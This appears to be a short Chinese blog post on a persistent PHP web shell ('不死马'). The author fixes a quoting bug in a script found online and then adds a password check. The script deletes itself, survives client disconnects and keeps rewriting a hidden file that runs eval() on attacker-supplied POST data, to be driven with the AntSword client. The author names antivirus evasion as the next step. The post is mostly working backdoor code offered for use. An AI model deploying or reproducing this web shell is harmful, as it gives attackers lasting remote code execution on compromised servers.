php不死马研究

百度了个不死马想用一下，发现报错。。。。

这样写的

<?php
set_time_limit(0);
ignore_user_abort(1); #1表示，忽略与客户端断开连接，继续执行脚本
unlink(__FILE__); #执行完后删除自身
while (1) {
$content = "<?php @eval($_POST["cmd"]) ?>";
file_put_contents(".bk.php", $content);
usleep(10000); #停一会
}
?>
但是执行起来是这样

 

 

服了，好多都是直接copy，连对不对都没看

在php中双引号中的变量可以解析，单引号就是绝对的字符串。

<?php
set_time_limit(0);
ignore_user_abort(1); #1表示，忽略与客户端断开连接，继续执行脚本
unlink(__FILE__); #执行完后删除自身
while (1) {
$content = '<?php @eval($_POST["cmd"]); ?>';
file_put_contents(".bk.php", $content);
usleep(10000); #停一会
}
?>

改成这样就可以了

 

如果不想让别人连，可以加上认证

set_time_limit(0);
ignore_user_abort(1); #1表示，忽略与客户端断开连接，继续执行脚本
unlink(__FILE__); #执行完后删除自身
while (1) {
$content = '<?php if(md5($_POST["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@eval($_POST["cmd"]);} ?>';
file_put_contents(".bk.php", $content);
usleep(10000); #停一会
}
?>

这时候需要蚁剑

 

在请求信息中添加

 

 

--------------

待解决，在linux系统中未测试能不能用，还有免杀问题